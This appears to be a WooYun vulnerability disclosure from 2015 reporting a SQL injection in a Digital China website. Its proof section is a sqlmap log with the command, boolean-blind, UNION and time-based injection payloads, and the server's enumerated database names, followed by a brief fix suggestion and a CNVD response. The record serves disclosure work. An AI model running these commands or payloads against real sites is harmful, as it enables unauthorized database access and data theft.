当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152600

漏洞标题:神州数码爆高危漏洞导致大量数据泄漏

相关厂商:神州数码

漏洞作者: 奶嘴

提交时间:2015-11-08 22:30

修复时间:2016-01-11 15:32

公开时间:2016-01-11 15:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-11-08: 细节已通知厂商并且等待厂商处理中
2015-11-19: 厂商已经确认,细节仅向厂商公开
2015-11-29: 细节向核心白帽子及相关领域专家公开
2015-12-09: 细节向普通白帽子公开
2015-12-19: 细节向实习白帽子公开
2016-01-11: 细节向公众公开

简要描述:

RTRT

详细说明:

http://**.**.**.**/c/about_mgt_details.php?id=12097 注入点

漏洞证明:

root@root:~# sqlmap -u http://**.**.**.**/c/about_mgt_details.php?id=12097 --dbs
sqlmap/1.0-dev - automatic SQL injection and database takeover tool
http://**.**.**.**
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 20:41:56
[20:41:56] [INFO] resuming back-end DBMS 'mysql'
[20:41:56] [INFO] testing connection to the target URL
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=12097' AND 2856=2856 AND 'LlJN'='LlJN
Type: UNION query
Title: MySQL UNION query (NULL) - 22 columns
Payload: id=12097' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716f637271,0x686e6a416d624e6b6b58,0x7177797771),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=12097' AND SLEEP(5) AND 'dZFr'='dZFr
---
[20:41:57] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6.3
web application technology: Apache 2.2.15
back-end DBMS: MySQL 5.0.11
[20:41:57] [INFO] fetching database names
[20:41:57] [WARNING] reflective value(s) found and filtering out
[20:41:57] [WARNING] something went wrong with full UNION technique (most probably because of limitation on retrieved number of entries). Falling back to partial UNION technique
[20:41:58] [WARNING] the SQL query provided does not return any output
[20:41:58] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[20:41:58] [INFO] fetching number of databases
[20:41:58] [INFO] resumed: 12
[20:41:58] [INFO] resumed: information_schema
[20:41:58] [INFO] resumed: bboard2_delete
[20:41:58] [INFO] resumed: kotocms003
[20:41:58] [INFO] resumed: mysql
[20:41:58] [INFO] resumed: performance_schema
[20:41:58] [INFO] resumed: test
[20:41:58] [INFO] resumed: tomocms2
[20:41:58] [INFO] resumed: tomocms2_center
[20:41:58] [INFO] resumed: tomocms2_cn
[20:41:58] [INFO] resumed: tomocms2_sg
[20:41:58] [INFO] resumed: tomocms2_tw
[20:41:58] [INFO] resumed: xinhuapinmei
available databases [12]:
[*] bboard2_delete
[*] information_schema
[*] kotocms003
[*] mysql
[*] performance_schema
[*] test
[*] tomocms2
[*] tomocms2_center
[*] tomocms2_cn
[*] tomocms2_sg
[*] tomocms2_tw
[*] xinhuapinmei
[20:41:58] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/**.**.**.**'
[*] shutting down at 20:41:58
root@root:~#

修复方案:

过滤
字符过滤不严

版权声明:转载请注明来源 奶嘴@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2015-11-19 18:37

厂商回复:

CNVD未直接复现所述情况,已经由CNVD通过网站公开联系方式向网站管理单位通报。

最新状态:

暂无